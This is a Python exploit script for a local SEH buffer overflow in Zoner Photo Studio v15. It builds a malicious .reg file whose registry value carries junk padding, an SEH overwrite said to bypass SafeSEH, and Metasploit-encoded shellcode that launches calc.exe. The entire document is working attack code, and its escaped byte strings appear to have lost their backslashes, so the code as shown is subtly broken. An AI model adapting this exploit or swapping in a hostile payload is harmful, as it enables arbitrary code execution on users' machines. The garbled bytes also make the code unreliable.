#!/usr/bin/python
 
# Exploit Title: Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Local Buffer Overflow
# Version:       15 Build 3, Build 2
# Date:          2012-11-09
# Author:        Julien Ahrens
# Homepage:      http://www.inshell.net
# Software Link: http://www.zoner.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Import Reg -> Start App

from struct import pack

file="poc.reg"

junk1="xCC" * 2136
nseh="xebx06x90x90"
eip=pack('<L',0x0C7D8F13) # JMP DWORD PTR SS:[EBP-18] - Access: (PAGE_READWRITE) [SafeSEH Bypass]
nops="x90" * 10 
junk2="xCC" * 1000

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0dx22x93'

shellcode = ("xbdx55xd9x54xcdxdbxdcxd9x74x24xf4x5ax33xc9" +
"xb1x33x31x6ax12x03x6ax12x83x97xddxb6x38xeb" +
"x36xbfxc3x13xc7xa0x4axf6xf6xf2x29x73xaaxc2" +
"x3axd1x47xa8x6fxc1xdcxdcxa7xe6x55x6ax9exc9" +
"x66x5ax1ex85xa5xfcxe2xd7xf9xdexdbx18x0cx1e" +
"x1bx44xffx72xf4x03x52x63x71x51x6fx82x55xde" +
"xcfxfcxd0x20xbbxb6xdbx70x14xccx94x68x1ex8a" +
"x04x89xf3xc8x79xc0x78x3ax09xd3xa8x72xf2xe2" +
"x94xd9xcdxcbx18x23x09xebxc2x56x61x08x7ex61" +
"xb2x73xa4xe4x27xd3x2fx5ex8cxe2xfcx39x47xe8" +
"x49x4dx0fxecx4cx82x3bx08xc4x25xecx99x9ex01" +
"x28xc2x45x2bx69xaex28x54x69x16x94xf0xe1xb4" +
"xc1x83xabxd2x14x01xd6x9bx17x19xd9x8bx7fx28" +
"x52x44x07xb5xb1x21xf7xffx98x03x90x59x49x16" +
"xfdx59xa7x54xf8xd9x42x24xffxc2x26x21xbbx44" +
"xdax5bxd4x20xdcxc8xd5x60xbfx8fx45xe8x6ex2a" +
"xeex8bx6e")

poc="Windows Registry Editor Version 5.00nn"
poc=poc + "[HKEY_CURRENT_USERSoftwareZONERZoner Photo Studio 15PreferencesCertificate]n"
poc=poc + ""Issuer"="" + junk1 + nseh + eip + nops + shellcode + junk2 + """

try:
    print "[*] Creating exploit file...n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";